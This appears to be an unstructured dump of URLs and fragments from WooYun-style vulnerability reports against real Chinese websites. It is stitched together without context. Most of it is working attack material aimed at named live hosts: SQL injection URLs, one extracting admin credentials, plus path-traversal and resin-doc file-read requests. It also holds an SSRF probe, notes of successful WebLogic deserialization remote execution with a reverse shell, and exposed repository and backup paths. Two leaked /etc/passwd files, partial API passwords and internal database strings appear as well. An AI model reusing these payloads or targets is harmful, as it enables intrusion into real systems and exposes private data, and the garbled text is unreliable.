http://**.**.**.**/fgs_arts/tw/activity_news_list.php?class_id=1 http://**.**.**.**/activity_news_list.php?class_id=1 http://**.**.**.**/activity_news_list.php?class_id=1 http://**.**.**.**/active_detail.php?id=145 http://**.**.**.**/active_detail.php?id=62 http://**.**.**.**/active_detail.php?id=124 http://rb.tcl.com/ http://rb.tcl.com/shell.jspx http://m.v.huatu.com/netclass/freeVideo.php?action=getMore&condition=&page=1&sqlClause=-1&type1=b.id http://www.zdonline.com/test/pie.php?p=2012 http://ec.eqixin.com/?sn=QX2209151383001441873713 URL:http://**.**.**.**/Card.aspx?CardNumder= id:98225、id:154565 http://**.**.**.**:8086/holidays/hotel_detail.asp?route=mfm&seq=10 http://**.**.**.**:8086/about/news_articles.asp?id=54 http://**.**.**.**:8086/tips/tips_intro.asp?unqid=12 http://daojia.com.cn/voucher_code.php?AC_area=1&name=%e8%af%b7%e8%be%93%e5%85%a5%e9%a4%90%e5%8e%85%e5%90%8d%e7%a7%b0 http://front.emba.huhoo.com/index.php/courses?huhoo_caseid=24 http://**.**.**.**/ https://**.**.**.**/rui/xmailer/blob/8dbb408b094e6676501929e87d8160e13385a20b/test/sertest.py http://meitu.fengniao.com/.svn/entries http://meitu.fengniao.com/css/.svn/entries http://counter.fengniao.com/log/all.log http://180.149.144.210/tool/demo.php?action=list&path=/home/bae/wwwdata/webroot/&t=1444798305167 http://blog.9666.cn/website/myWebsite.action?BlogType=3 http://wooyun.org/bugs/wooyun-2015-0156000 http://mail.zto.cn/index.php http://**.**.**.**/ http://**.**.**.**/ http://edu.baidu.com// http://edu.baidu.com/taoli/resource/personInfoG.jsp http://jzcc.zznissan.com.cn/ http://jzcc.zznissan.com.cn/map.php?jxs=223 http://jxpt.cuc.edu.cn/ http://jxpt.cuc.edu.cn http://123.103.9.38:8080/secure/Dashboard.jspa http://123.103.9.38:8080/secure/Signup!default.jspa http://**.**.**.**:8001 http://60.255.41.34/ http://**.**.**.**/ywsp/lcpz/fjgl_downLoad.jsp?wid=1 https://vpn.wanda.cn http://shop.9you.com/yzbp/like http://admin.open.yy.com/ http://admin.open.yy.com/stat/index.php.bak http://**.**.**.**:8083/holidays/hotel_detail.asp?route=mfm&seq=30 http://**.**.**.**:8083/about/news_articles.asp?id=21 http://**.**.**.**:8083/tips/tips_intro.asp?unqid=1 http://**.**.**.**:8083/airshopping/eshopping_intro.asp?item=51002922 retrieved:guestuser http://163.177.25.60/ http://www.qh.sgcc.com.cn:7001是weblogic。测试一下居然成功执行了 http://lib.cqvip.com http://x.luckyair.net:88/cms/jeeadmin/jeecms/index.do http://**.**.**.**/xwzx/xx.jsp?newsId=1321 XSS:http://**.**.**.**/ http://**.**.**.**/quality/index!login.action http://**.**.**.**/zxgg/index.php?p=4&kind_id=1 http://sh.itjuzi.com/everjob?id=1&type=invsp http://www.gofull.com.cn/):共富网是由一群致力于普惠金融和金融民主化的中国式合伙人团队创立,团队成员拥有国内外一流著名高校学历背景,各自在银行、小额贷款、融资担保、基金、保险以及上市金融IT公司等金融行业积累了丰富实战和管理经验,熟悉中国当前的信用环境和中小企业的融资困境,同时又怀揣“实现让人人享有平等投资权”的梦想。共富网拥有投资超千万级的风控、交易平台系统,专业的金融行业软件开发团队和运维团队,与阿里云、国际知名资信评估公司、全国性商业银行、领先的国有第三方支付公司合作,实现资金安全、网络安全、系统安全、数据安全。(官网介绍) http://**.**.**.**/graVoxCourse/index.php/gquery/MainPage?DPGCODE=R1-12101&INYEAR=104 http://meta.yy.com/ http://meta.yy.com/back/admin/ https://**.**.**.**//tw/news-tw?keyword=1&search_month=all&search_year=all&start=1 http://**.**.**.** http://**.**.**.**:8008/student/studyinfo?xxzh=51189710 http://**.**.**.**:8008/student/studyinfo?xxzh=51189710 http://**.**.**.**:8008/student/studyinfo?xxzh=51189711 http://**.**.**.**/web.rar http://**.**.**.**/manage/login.aspx http://**.**.**.**/UpFile/2010-07-21_251859458.asp http://fw.huhoo.com/index.php/ajax/getlist?callback=jQuery19105914390394464135_1447911702806&huhoo_caseid=11&id=3360&parentid=3360&_=1447911702807 http://www.noahedu.com/services-feedback.shtml http://**.**.**.**/bugs/wooyun-2010-0144850 http://**.**.**.**/bugs/wooyun-2010-0155584 http://**.**.**.**/bugs/wooyun-2010-0144850 http://**.**.**.**:7001/sims/ http://**.**.**.**:7001/sims/chgpwd.htm http://chemsrsp.cqvip.com/bq4sql?namecn=-1 http://**.**.**.**/ http://**.**.**.**/sys/portal/page.jsp http://web.jingoal.com/#workbench~type=contact http://tian.shnu.edu.cn http://123.103.9.77/WebLogin.aspx http://123.103.9.77/User_Regist.aspx http://os.wasu.cn/liuchen/editsq.php?id=1 http://os.wasu.cn/liuchen/editsq.php?id=1 http://**.**.**.**/egovhall/default.aspx?tabid=342 http://sbc.ecnu.edu.cn/caigou.asp?parentID=1309 COLUMNS:id,custno,password,bindtime,openid,userid,keyboat COLUMNS:id,cardid,hphm,instation,outstation,type,price,exchangetime,issend,intime,updatetime,recordtype,cardbalance,cartype,province,cardtype http://60.10.8.227:88/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://pyh.luckyair.net:80/ http://**.**.**.** http://**.**.**.**:80/ http://alum.sz.tsinghua.edu.cn/getMbyx.jsp?userid=-1 B08E9B04CCAA921EF53A517D9B444291:FG=1 http://211.150.65.155:7001/开始看到以为是网易的.发现所用的服务端是weblogic的.试了下最新的java反序列执行漏洞.直接成功。反弹出来后发现是cntv。查看80端口却也是cntv的 http://221.8.57.106:7004/console http://221.8.57.106:7006/console http://221.8.57.106:7004/ca/ma3.jsp jdbc:oracle:thin:@10.0.7.101:1521:ahdb http://v.huatu.com/api/ccmobilev2/Public/freeVideo/liveFree.php?&userid=4473332&rid=1632;WAITFOR http://alumni.sz.tsinghua.edu.cn/structure/?do=listframe&group_id=361&page=list http://125.69.85.24/ http://api.bilibili.com/favourite/add?fav_box=0&id=视频ID http://interface.bilibili.com/feedback/post?aid=AV号&action=send"eID=&msg=评论内容 http://www.bilibili.com/plus/comment.php http://**.**.**.**/manage/index.php http://123.103.9.112/login.jsp http://123.103.9.112/secure/Signup!default.jspa http://idm2.tcl.com:8088/manager https://mail.wasu.com/bookmark.jsp?command=delete&bookmarkselect=2 https://mail.wasu.com/bookmark.jsp?command=delete&bookmarkselect=2 http://124.205.224.180:7001 http://bbs.ticwear.com/.git/服务器返回403说明文件存在,接下来用上git神器,获得所有的源码 http://bioinfo.au.tsinghua.edu.cn http://218.106.129.50/nt/aspx/1/readme.aspx?selectedtemplateid=1 http://218.108.255.183/UserLogin/Login.aspx http://daojia.com.cn/list_rest.php?a=0&s=2 http://**.**.**.**:80/ http://**.**.**.**:81/company/ShowJobs.aspx?Fid=107978&ZwId=167260 www.yunshan.net.cn,访问后会跳转至2cloud.com https://2cloud.com/ https://cms.2cloud.com/ inurl:/sfs3/modules/ http://101.227.9.199/jenkins/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin cimsrvr:x:134:134:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin app_admin:x:500:500::/home/app_admin:/bin/bash community:x:501:501::/home/community:/bin/bash dlord:x:502:502::/home/dlord:/bin/bash douhua:x:503:503::/home/douhua:/bin/bash jifadmin:x:504:504::/home/jifadmin:/bin/bash vip:x:505:505::/home/vip:/bin/bash feeportal:x:506:506::/home/feeportal:/bin/bash uis:x:507:507::/home/uis:/bin/bash toodou:x:508:508::/home/toodou:/bin/bash xpage:x:509:509::/home/xpage:/bin/bash channelpage:x:510:510::/home/channelpage:/bin/bash cms:x:511:511::/home/cms:/bin/bash mycenter:x:512:512::/home/mycenter:/bin/bash watch:x:513:513::/home/watch:/bin/bash jmq:x:514:514::/home/jmq:/bin/bash subscription:x:515:515::/home/subscription:/bin/bash usersrv:x:516:516::/home/usersrv:/bin/bash useritemsrv:x:517:517::/home/useritemsrv:/bin/bash nliu:x:518:518::/home/nliu:/bin/bash mutualupload:x:519:519::/home/mutualupload:/bin/bash cos:x:520:520::/home/cos:/bin/bash wt_test:x:521:521::/home/wt_test:/bin/bash vsgManager:x:522:522::/home/vsgManager:/bin/bash vsgcms:x:523:523::/home/vsgcms:/bin/bash mysql:x:524:524::/home/mysql:/bin/bash jenkins:x:525:525::/home/jenkins:/bin/bash http://101.227.9.130:8080/browse/CC#selectedTab=com.atlassian.jira.plugin.system.project%3Acomponents-panel http://hanhong.swu.edu.cn/ http://hanhong.swu.edu.cn http://analysis.anquanbao.com/c.php http://analysis.anquanbao.com/a.php http://analysis.anquanbao.com/s.php http://hunlian.cn/ http://122.224.6.58:3333 http://122.224.6.58:3333/avatar.swf http://os.wasu.cn/liuchen/sq.php?id=1 http://os.wasu.cn/liuchen/sq-bd.php?id=1 http://os.wasu.cn/liuchen/sq.php?id=1 https://github.com/fucifer/learn/blob/07f3ddd8bf3568d1033cf040792912b9e0023a34/dphd/src/main/resources/env/config.properties http://www.gzl.com.cn/b2c-web/member/order/201511260000289/Tour.html http://**.**.**.** http://efe.baidu.com/ http://efe.baidu.com/efe.zip http://**.**.**.**/wsks/admin.asp http://**.**.**.**/module/ViewNews.asp?ArticleID=3zbtfb201111239403 http://js.crland.com.cn/project.aspx?mid=4-0&pid=20&id=24&cpath=2 http://**.**.**.**/aqcp/aqgl/ldsmglxttopscanner/ http://online.suning.com/console/Service/Console/Index http://online.suning.com/console/Service/supplieradmin/customerIndex http://**.**.**.**/bugs/wooyun-2015-0152363/trace/3bf1826591c4373d8851ac9f18096a03 http://**.**.**.** http://xianchang03.danmu.tudou.com/login.do http://www.slimframework.com/ http://www.slimframework.com/docs/objects/request.html#the-request-body http://zone.wooyun.org/content/19908 https://github.com/longlijian/hdf-client/tree/f410e709b8a4e7ad0bb8f5b2e355c9f5fbc5e110/v3.15.103 http://210.51.167.101/.svn/entries http://z.ziroom.com/.DS_Store http://210.51.167.189/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sun:x:500:500:sunyang:/home/sun:/bin/bash mysql:x:101:102:MySQL server:/var/lib/mysql:/bin/bash bwlnlHkF2wxxQ21:16732:0:99999:7 http://**.**.**.**/gzwl/visit/renewBusinessOrder/renewBusinessOrderExecute.action?id=49733606 http://**.**.**.**/product/products.php?cid=3 http://www.e-soochowlife.com http://wangxindai.cn/invest/full_success/a20150900003.html http://oa.daojia.58.com/seeyon/main.do?method=main http://**.**.**.**/bugs/wooyun-2010-0142772 http://123.59.1.149/zabbix/ http://www.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://tjlog.ps.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://service.pay.easou.com:8000/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://searchapi.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://kanpian.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://www2.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://appdispatch.ps.easou.com/resin-doc/examples/security-basic/viewfile?file=index.jsp http://appdispatch.ps.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://bookwebview.shift.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://dapk.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://videoapi.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://bookwebview.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://dapk.shift.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://ec3.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://ir.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://wap.shift.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://hd.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://wap.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://f.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://da.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://jipiao.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://wan.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://ec.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://pic.ps.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://ads.ml.shift.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://ads.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://am.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://ads.easou.com:8080/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://shu.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://a.ml.shift.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://a.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://sso.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://m.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://tq.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jpp http://l.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://fk.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://news.shift.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://n.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://news.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://183.232.129.84/.svn/entries http://183.232.129.83/.svn/entries http://120.197.138.69/info.php http://120.197.138.69/.svn/entries http://mydata.51cdn.com:8888/getIp.php?sername=suning&channel=www.suning.cn&passwd=6b3454d97580487b40******2c9d1b5c  http://mydata.51cdn.com:8888/getIp.php?username=suning&channel=image.suning.cn&passwd=cac74a1ac16e578******1985ea69e03 http://mydata.51cdn.com:8888/getIp.php?username=suning&channel=image1.suning.cn&passwd=2e03f78e12a8b4******2740ff1c3968 http://103.255.95.182:8088 http://103.255.95.182:8088/logs/hadoop-root-namenode-master01.hadoop.log https://passport.ganji.com/login.php?next=http%3A%2F%2Fwww.ganji.com%2Fsite%2Fu%2F http://fangvip.ganji.com/auth.php?do=login http://fangvip.ganji.com http://web.jingoal.com/#worklog http://**.**.**.**/ http://**.**.**.**:80/ http://www.taowola.com/list.php?cid=2 http://www.taowola.com/list.php?mid=1&cid= http://**.**.**.**/up/ http://**.**.**.**/Chart/OilChart.aspx?ChartDirectorChartImage=chart_fxChart&cacheDefeat=635826864174711701&cacheId=c:\windows\win.ini http://**.**.**.**/struts1hibernate/address_edit.do?method=edit&id=27022 http://www.x-lab.tsinghua.edu.cn/?a=projectshow&c=nurture&id=229 http://report.chinapnr.com存在Weblogic,这个版本存在java远程命令执行漏洞 http://**.**.**.**/forget/forget_way.htm http://www.lagou.com/gongsi/100827.html http://www.kouyuliao.com/ http://m.flyertrip.com/ http://m.flyertrip.com/index.php/Admin/Login/login.html http://idstar.xmu.edu.cn/amserver/UI/Login http://i.xmu.edu.cn http://inc2.xmu.edu.cn/handbook/public/24/看到vpn设置 http://**.**.**.**/old/comm_serv_detail.php?id=105 http://**.**.**.**/comm_serv_detail.php?id=101 http://**.**.**.**/comm_serv_detail.php?id=4 http://**.**.**.**/jiannren/comm_serv_detail.php?id=5 http://**.**.**.**/comm_serv_detail.php?id=1 http://**.**.**.**/comm_serv_detail.php?id=10 http://**.**.**.**/comm_serv_detail.php?id=1791 http://**.**.**.**/06/comm_serv_detail.php?id=4 http://**.**.**.**/prod_detail.php?item_id=953 http://**.**.**.**/prod_detail.php?item_id=30 http://**.**.**.**/prod_detail.php?item_id=7 http://**.**.**.**/prod_detail.php?item_id=9 http://**.**.**.**/prod_detail.php?item_id=9796 http://**.**.**.**/ch/prod_detail.php?item_id=76 http://**.**.**.**/prod_detail.php?item_id=1 http://**.**.**.**/prod_detail.php?item_id=8 http://**.**.**.**/prod_detail.php?item_id=3826 http://**.**.**.**/ch/prod_detail.php?item_id=29 http://**.**.**.**/tuningwork-shop/prod_detail.php?item_id=121 http://**.**.**.**/prod_detail.php?item_id=35 http://**.**.**.**/prod_detail.php?item_id=324 http://**.**.**.**/prod_detail.php?item_id=147 http://**.**.**.**/prod_detail.php?item_id=17 http://**.**.**.**/prod_detail.php?item_id=2 http://**.**.**.**/prod_detail.php?item_id=1 http://**.**.**.**/prod_detail.php?item_id=44 http://**.**.**.**/ch/prod_detail.php?item_id=26 http://**.**.**.**/prod_detail.php?item_id=860 http://hg.airchinacargo.com/ http://**.**.**.**/JspBack/User_top.jsp?userid=xzh618 http://www.flyertrip.com/hotels/personalCenter/myOrderAll.php,在搜索框随便搜索点东西,比如"t"。 http://www.flyertrip.com/hotels/personalCenter/myOrder.php?condition=t http://www.flyertrip.com/hotels/personalCenter/orderDetail.php?flag=detail&id=7095 http://www.flyertrip.com/hotels/personalCenter/orderDetail.php?flag=detail&id=7095 http://www.cpsri.com.cn/ http://jf.ztgame.com/tmp/config.txt,数据库配置可以直接查看 http://os.wasu.cn/new/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://www.gzl.com.cn/b2c-web/account/checkAccountName.json?mobileNo=XXXXXX http://wsbm.shnu.edu.cn http://dbs.arch.tsinghua.edu.cn/dbs/index.php?category=news&display=trends&id=25 http://**.**.**.**/ jdbc:oracle:thin:@**.**.**.**:1521:orcl http://www.flyertrip.com/hotels/book.php http://games.mobileapi.hupu.com/3/7.0.4/quiz/getRankingListAjax?token=xxxd&client=xxx=1&pid=151099%27/**/union/**/select http://**.**.**.**上,问题文件 http://**.**.**.**/fileupload/FileUpload.htm http://**.**.**.**/fileupload/filename.ext http://mju.ss.cqvip.com/library/page/ajax.aspx?action=CheckUserExsit&flag=0¶m=0.5561432782560587&values=-1 http://www.flyertrip.com/hotels/personalCenter/ticketdetail.php?id=ORID144844004777183 http://aaa.daojia.com.cn http://www.flyertrip.com/hotels/personalCenter/myAccount.php修改密码 http://qiyuan.tsinghua.edu.cn http://m.v.huatu.com/netclass/search.php?action=search http://eelab.tsinghua.edu.cn/content/index.php?act=catelist&keyword=-1 http://cafe.baidu.com http://gzzb.kingsoft.com http://**.**.**.**/jianjie_moban.jsp?BigClassID=3&SmallClassID=29&NewsID=11757 http://**.**.**.**/jianjie_moban.jsp?BigClassID=1&SmallClassID=7&NewsID=2510%20SmallClassID=7 http://**.**.**.**/jianjie_moban.jsp?BigClassID=2&SmallClassID=15&threeClassID=11&NewsID=3656%20SmallClassID=15 http://**.**.**.**/jianjie_moban.jsp?BigClassID=1&SmallClassID=7 http://new.conqueror.cn/command/ajax/ajax.php?func=get_info&id=650&row=characteristic http://webgame.ali213.net http://supplychain.app.com.cn:7001/eipp_app/security/login.hlt http://supplychain.app.com.cn:7001/console/login/LoginForm.jsp http://wwx.jufangbian.com/wx/so/detail.html?id=10211 http://auto.hualongxiang.com/shop?aid=1&bid=48 http://***_llt.umpay.com/duihuan.php?status=2&id=35317 http://user.rayli.com.cn/member.php?mod=getpasswd&uid=&id= cn:2051 UserManagement.svc/LoginForWebUser cn:2051 http://www.iugame.cn//isgame/sjhd/ajax.aspx http://news.jlu.edu.cn/new/?keyword=1&mod=search http://tt.76ju.com/?action=detail&id=6171-0 http://tt.76ju.com/?action=detail&id=6171-0 http://**.**.**.**/ http://**.**.**.**/journalx/editorInChiefLogOn.action http://**.**.**.**/journalx/admin/UserGroup.action http://**.**.**.**/journalx/admin/User.action?method=edit&id=6001 http://**.**.**.**/journalx/editorLogOn.action http://**.**.**.**/journalx/manuscript/ListManuscriptFromEditorDeskTop.action?sorter.field=2&sorter.order=desc http://**.**.**.**/journalx/basicinfo/Person!lists.action?blank=%27extend%27&rolsesp=6 http://jiayingxb.**.**.**.**:80/ http://wh.xf.fangtoon.com/index.php?r=XfActive/Detail&id=2%27%20and%201=1 http://help.eventdove.com http://help.eventdove.com/wp-login.php?loggedout=true http://www.nbopen.com.cn/index.php?s=/Train/views/id/6* http://sqlmap.org http://**.**.**.**/glxx/index.gl?id=2110 http://www.oppo.com/my/supports/imei-check/check_imei.php?ino=e http://**.**.**.**/ProcList.aspx?CPLX=%E4%BF%A1%E6%89%98%E4%BA%A7%E5%93%81&K=1%27%20and%201=@@version http://www.ie.tsinghua.edu.cn/students/index_list.php?key=&newsorder=sendtime&StartPage=532&ty=62 http://lpms-jf-stg.wanlitong.com/solr/admin jdbc:mysql://192.168.14.90:3306/db_wlt_goods?useUnicode=true&characterEncoding=utf-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true mail.tsinghua.edu.cn/liuwansen http://my2.wanbang.net:6888 http://gts.zte.com.cn:7001 http://espel.sem.tsinghua.edu.cn/public/faq_show.php?id=1 http://os.wasu.cn/lx/editemployee.php?id=1 http://www.yichengpin.com http://www.yichengpin.com/address/address-addAddress.do http://**.**.**.**/recommend.php?a=detail&rid=3299 http://**.**.**.**/xyschool/?a=t_detail&id=29 http://**.**.**.**/knowledge.php?a=detail&tid=52675 http://**.**.**.**/bbs.php?a=detail&did=357 http://**.**.**.**/bbs.php?a=bbs_quan&qid=1 http://**.**.**.**/baike.php?a=detail&kid=35 http://wiki.eloancn.com/login.action?logout=true http://open.wanlitong.com https://open.wanlitong.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.20.61:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://**.**.**.**/index.php?mod=article&category_id=22&article_id=37541 http://**.**.**.**/index.php?mod=article&category_id=22&article_id=37541 http://**.**.**.** http://**.**.**.**/defaultroot/portal.jsp http://**.**.**.**/defaultroot/work_flow/jsFileUpload.jsp http://**.**.**.**/defaultroot/devform/workflow/baidu.jsp http://www.xintai.com/web/user/resetPwd/index.jsp http://**.**.**.** http://**.**.**.**/gzzd/show.php?gzzd_id=1 http://**.**.**.**/papers/10652 http://**.**.**.**/datalist/default.aspx/article?category_id=1051 http://data.inspur.com:8011 http://**.**.**.**/Conf/jsp/user/loginAction.do http://**.**.**.**:443/Conf/jsp/main/mainAction.do http://**.**.**.**/Conf/jsp/main/mainAction.do http://**.**.**.**:82/Conf/jsp/main/mainAction.do http://payment.chinapnr.com存在Weblogic,这个版本存在java远程命令执行漏洞 http://**.**.**.**/News_Text.php?id=1082*&class_id=20 http://**.**.**.** https://set2.mail.qq.com/cgi-bin/viewfile?f=B44F4E6E5CB0A4CCBB0CC8200C8C6CEF6367DC612E4BC3B4&mailid=ZL3127-3JRtOe0Vqil%7EZmYwRRSAB5b&sid=XXXXXXXXXX【SID】XXXXXX&net=931323402 http://online.greatlife.cn:8001 http://open.boc.cn/manage/ http://**.**.**.**/NewList.aspx?C=10102 http://**.**.**.**/ http://**.**.**.**/sohu/shadminlist.php http://**.**.**.**/news.jsp?id=36 http://sdjc.ujn.edu.cn/ https://github.com/lip2up/mydev https://github.com/lip2up/mydev/blob/master/old/lipmail/App.config juesheng.com/js2015_1q2w,登录到CRM系统: http://**.**.**.**/system/login.do http://pn.ujn.edu.cn/ http://pn.ujn.edu.cn/news.php?id=14 http://wx.ehuatai.com/htstation/ http://wx.ehuatai.com/iesvc/iesvc.jsp http://wx.ehuatai.com/zecmd/zecmd.jsp http://**.**.**.**/ShowNewsDetail.aspx?PartDetailID=10&ArticleID=1309 http://**.**.**.**/gsgk.php?num=1 http://**.**.**.**:7001/loginback.aspx http://**.**.**.**:7001/loginback.aspx http://**.**.**.**/ http://**.**.**.**:80/ http://**.**.**.**/enterprise/history_info.php?id=29 http://news.lib.tsinghua.edu.cn http://www.rsta.tsinghua.edu.cn http://**.**.**.**/?a/id/11.html http://www.apcws.tsinghua.edu.cn/?Research/id/5.html http://www.yijifen.com/ http://oa.baihe.com:3220/jsoa/login.jsp http://oa.baihe.com:3220/jsoa/WorkFlowProcAction.do?flowpara=1&search=&workTitle=&activityName=%B7%A2%C6%F0%C8%CB%B4%F2%D3%A1&submitPersonId=10026614&submitPerson=%B6%C5%BB%A2&work=10749050&workType=1&activity=1210458&table=1209987&record=10748914&processName=BH009-%BD%E8%BF%EE%C0%E0%C1%F7%B3%CC&workStatus=1011&submitTime=2015-11-23%2016:00:08.0&processId=1210437&stepCount=1&isStandForWork=0&standForUserId=0&standForUserName=null&initActivity=1210439&initActivityName=%BE%AD%C0%ED&submitPersonTime=2015-11-23%2016:00:08.0&tranType=null&tranFromPersonId=null&fromdesktop=1 https://owa.corp.gome.com.cn/ http://work.tju.edu.cn vip.wissun.com/?杨静178 http://211.94.93.4/LoginAction.do?m=goLogin https://mail.ceair.com http://**.**.**.**/file/ http://211.94.93.8/mail/WebmailLogin.html http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2 